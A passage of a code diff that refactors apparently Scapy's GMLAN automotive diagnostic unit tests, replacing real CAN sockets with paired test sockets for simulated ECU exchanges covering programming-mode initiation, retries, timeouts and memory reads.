started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_PM(subfunction=0x1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN(b"\xe5") - time.sleep(0.1) - # InitiateProgramming enableProgramming - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_PM(subfunction=0x3) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN(b"\x28") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x68" + time.sleep(0.1) + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN(b"\xa2") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + time.sleep(0.1) + # ProgrammingMode requestProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_PM(subfunction=0x1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN(b"\xe5") + time.sleep(0.1) + # InitiateProgramming enableProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_PM(subfunction=0x3) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = sequence of the correct messages, disablenormalcommunication as broadcast -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() + +broadcastsender = TestSocket(CAN) +broadcastrcv = TestSocket(CAN) +broadcastsender.pair(broadcastrcv) def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2, \ - new_can_socket0() as broadcastrcv: - print("DisableNormalCommunication") - requ = broadcastrcv.sniff(count=1, timeout=2, started_callback=started.set) - assert len(requ) >= 1 - if bytes(requ[0].data)[0:3] != b"\xfe\x01\x28": - ecusimSuccessfullyExecuted = False - print("ReportProgrammedState") - requ = isotpsock2.sniff(count=1, timeout=2) - pkt = GMLAN(b"\xa2") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - print("ProgrammingMode requestProgramming") - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_PM(subfunction=0x1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN(b"\xe5") - print("InitiateProgramming enableProgramming") - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_PM(subfunction=0x3) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False + print("DisableNormalCommunication") + requ = broadcastrcv.sniff(count=1, timeout=2, started_callback=started.set) + assert len(requ) >= 1 + if bytes(requ[0].data)[0:3] != b"\xfe\x01\x28": + ecusimSuccessfullyExecuted = False + print("ReportProgrammedState") + requ = isotpsock2.sniff(count=1, timeout=2) + pkt = GMLAN(b"\xa2") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + print("ProgrammingMode requestProgramming") + requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_PM(subfunction=0x1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN(b"\xe5") + print("InitiateProgramming enableProgramming") + requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_PM(subfunction=0x3) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(new_can_socket0()), timeout=5, verbose=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(broadcastsender), timeout=5, verbose=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True ######## timeout = timeout DisableNormalCommunication -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN(b"\x28") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN(b"\x28") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = timeout ReportProgrammedState -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN(b"\x28") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x68" - time.sleep(0.1) - # ReportProgrammedState - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN(b"\xa2") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - time.sleep(0.1) - isotpsock2.send(ack) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN(b"\x28") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN(b"\xa2") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = timeout ProgrammingMode requestProgramming -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN(b"\x28") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x68" - time.sleep(0.1) - # ReportProgrammedState - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN(b"\xa2") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - # ProgrammingMode requestProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_PM(subfunction=0x1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN(b"\x28") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN(b"\xa2") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + # ProgrammingMode requestProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_PM(subfunction=0x1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True ###### negative respone = timeout DisableNormalCommunication -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN(b"\x28") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - time.sleep(0.1) - isotpsock2.send(ack) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN(b"\x28") + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True ###### retry tests = sequence of the correct messages, retry set -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x68" - # ReportProgrammedState - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - # ProgrammingMode requestProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN(b"\xe5") - # InitiateProgramming enableProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + # ProgrammingMode requestProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN(b"\xe5") + # InitiateProgramming enableProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == True - assert res - thread.join(timeout=5) +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == True +assert res +thread.join(timeout=5) = negative response, make sure no retries are made -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - if len(requ) != 0: - ecusimSuccessfullyExecuted = False + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + if len(requ) != 0: + ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = first fail at DisableNormalCommunication, then sequence of the correct messages -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - # DisableNormalCommunication - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = b"\x68" - # ReportProgrammedState - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - # ProgrammingMode requestProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN(b"\xe5") - # InitiateProgramming enableProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + # ProgrammingMode requestProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN(b"\xe5") + # InitiateProgramming enableProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True +thread.join(timeout=5) +assert res = first fail at ReportProgrammedState, then sequence of the correct messages -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x68" - # Fail - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN() / GMLAN_NR(requestServiceId=0xA2, returnCode=0x12) - # DisableNormalCommunication - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = b"\x68" - # ReportProgrammedState - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - # ProgrammingMode requestProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN(b"\xe5") - # InitiateProgramming enableProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x68" + # Fail + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN() / GMLAN_NR(requestServiceId=0xA2, returnCode=0x12) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + # ProgrammingMode requestProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN(b"\xe5") + # InitiateProgramming enableProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True +thread.join(timeout=5) +assert res = first fail at ProgrammingMode requestProgramming, then sequence of the correct messages -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x68" - # ReportProgrammedState - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - # Fail - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN() / GMLAN_NR(requestServiceId=0xA5, returnCode=0x12) - # DisableNormalCommunication - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = b"\x68" - # ReportProgrammedState - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - # ProgrammingMode requestProgramming - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN(b"\xe5") - time.sleep(0.1) - isotpsock2.send(ack) - # InitiateProgramming enableProgramming - requ = isotpsock2.sniff(count=1, timeout=1) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + # Fail + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN() / GMLAN_NR(requestServiceId=0xA5, returnCode=0x12) + # DisableNormalCommunication + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = b"\x68" + # ReportProgrammedState + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN()/GMLAN_RPSPR(programmedState=0) + # ProgrammingMode requestProgramming + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN(b"\xe5") + isotpsock2.send(ack) + # InitiateProgramming enableProgramming + requ = isotpsock2.sniff(count=1, timeout=1) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True +thread.join(timeout=5) +assert res = fail twice -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - if len(requ) != 0: - ecusimSuccessfullyExecuted = False + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + if len(requ) != 0: + ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True ############################################################################## + GMLAN_ReadMemoryByAddress Tests ############################################################################## = Positive, short length, scheme = 4 -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -1236,76 +1116,59 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN() / GMLAN_RMBA(memoryAddress=0x0, memorySize=0x8) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN() / GMLAN_RMBAPR(memoryAddress=0x0, dataRecord=payload) - time.sleep(0.1) - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN() / GMLAN_RMBA(memoryAddress=0x0, memorySize=0x8) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = GMLAN() / GMLAN_RMBAPR(memoryAddress=0x0, dataRecord=payload) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) == payload - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) == payload +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = Negative, negative response -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = GMLAN() / GMLAN_NR(requestServiceId=0x23, returnCode=0x31) - time.sleep(0.1) - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = GMLAN() / GMLAN_NR(requestServiceId=0x23, returnCode=0x31) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None +thread.join(timeout=5) +assert res = Negative, timeout -drain_bus(iface0) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None +assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None ###### RETRY = Positive, negative response, retry succeeds -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) 